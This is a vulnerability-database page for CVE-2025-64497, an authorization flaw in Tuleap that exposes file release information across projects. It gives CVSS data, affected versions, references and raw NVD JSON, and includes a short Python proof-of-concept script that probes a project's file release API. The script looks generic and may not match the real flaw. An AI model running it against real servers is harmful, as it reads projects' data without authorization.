Security Vulnerability Report
CVE-2025-64497 CVSS 6.5 MEDIUM

CVE-2025-64497

Published: 2025-12-08 23:15:48
Last Modified: 2025-12-10 21:10:19

Description

Tuleap is an Open Source Suite for management of software development and collaboration. Versions below 17.0.99.1762431347 of Tuleap Community Edition and Tuleap Enterprise Edition below 17.0-2, 16.13-7 and 16.12-10 allow attackers to access file release system information in projects they do not have access to. This issue is fixed in version 17.0.99.1762431347 of the Tuleap Community Edition and versions 17.0-2, 16.13-7 and 16.12-10 of Tuleap Enterprise Edition.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:* - VULNERABLE (Tuleap Community Edition < 17.0.99.1762431347)
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE (Tuleap Enterprise Edition >= 17.0, < 17.0-2)
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE (Tuleap Enterprise Edition >= 16.13, < 16.13-7)
cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:* - VULNERABLE (Tuleap Enterprise Edition < 16.12-10)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64497 PoC - Tuleap File Release System Unauthorized Access
# This PoC demonstrates accessing file release system info without proper authorization
import sys

import requests


def check_tuleap_version(base_url):
    """Check Tuleap version via the /api/version endpoint."""
    version_url = f"{base_url}/api/version"
    try:
        response = requests.get(version_url, timeout=10)
        if response.status_code == 200:
            return response.json()
    except requests.RequestException:
        return None
    return None


def exploit_unauthorized_access(base_url, project_id, session_cookie=None):
    """
    Exploit CVE-2025-64497
    Access file release system information without authorization
    """
    headers = {}
    if session_cookie:
        headers['Cookie'] = session_cookie

    # Try to access file release system of a project without access rights
    file_release_url = f"{base_url}/api/projects/{project_id}/file_releases"
    try:
        response = requests.get(file_release_url, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Successfully accessed file release system for project {project_id}")
            print(f"[+] Response: {data}")
            return True
        elif response.status_code == 403:
            print("[-] Access denied (expected after patch)")
            return False
        else:
            print(f"[*] Unexpected response: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-64497-poc.py <target_url> [project_id] [session_cookie]")
        print("Example: python cve-2025-64497-poc.py https://tuleap.example.com 123")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    project_id = sys.argv[2] if len(sys.argv) > 2 else '1'
    session_cookie = sys.argv[3] if len(sys.argv) > 3 else None

    print(f"[*] Testing CVE-2025-64497 on {base_url}")
    print(f"[*] Target project ID: {project_id}")

    # Check version first
    version_info = check_tuleap_version(base_url)
    if version_info:
        print(f"[*] Tuleap version: {version_info}")

    # Attempt exploitation
    exploit_unauthorized_access(base_url, project_id, session_cookie)


if __name__ == "__main__":
    main()
```

References

https://github.com/Enalean/tuleap/commit/403eb69f4cfafe52254c8f9bdbe66e1fedadc254 (Patch)
https://github.com/Enalean/tuleap/security/advisories/GHSA-v6vm-6rxf-7p2v (Vendor Advisory)
https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=403eb69f4cfafe52254c8f9bdbe66e1fedadc254 (Patch, Broken Link)
https://tuleap.net/plugins/tracker/?aid=45583 (Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64497", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:47.957", "lastModified": "2025-12-10T21:10:18.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is an Open Source Suite for management of software development and collaboration. Versions below 17.0.99.1762431347 of Tuleap Community Edition and Tuleap Enterprise Edition below 17.0-2, 16.13-7 and 16.12-10 allow attackers to access file release system information in projects they do not have access to. This issue is fixed in version 17.0.99.1762431347 of the Tuleap Community Edition and versions 17.0-2, 16.13-7 and 16.12-10 of Tuleap Enterprise Edition."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.12-10", "matchCriteriaId": "286870BF-3315-4B78-AC67-97EB2D5F34ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1762431347", "matchCriteriaId": "87001E6B-3376-4485-B782-EA59DB145812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.13", "versionEndExcluding": "16.13-7", "matchCriteriaId": "CBD9092A-8E4A-43EF-B9B8-D8BDA9D30430"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-2", "matchCriteriaId": "F96A9306-179A-48BD-A2D9-CB081E9747B8"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/403eb69f4cfafe52254c8f9bdbe66e1fedadc254", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-v6vm-6rxf-7p2v", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=403eb69f4cfafe52254c8f9bdbe66e1fedadc254", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45583", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
```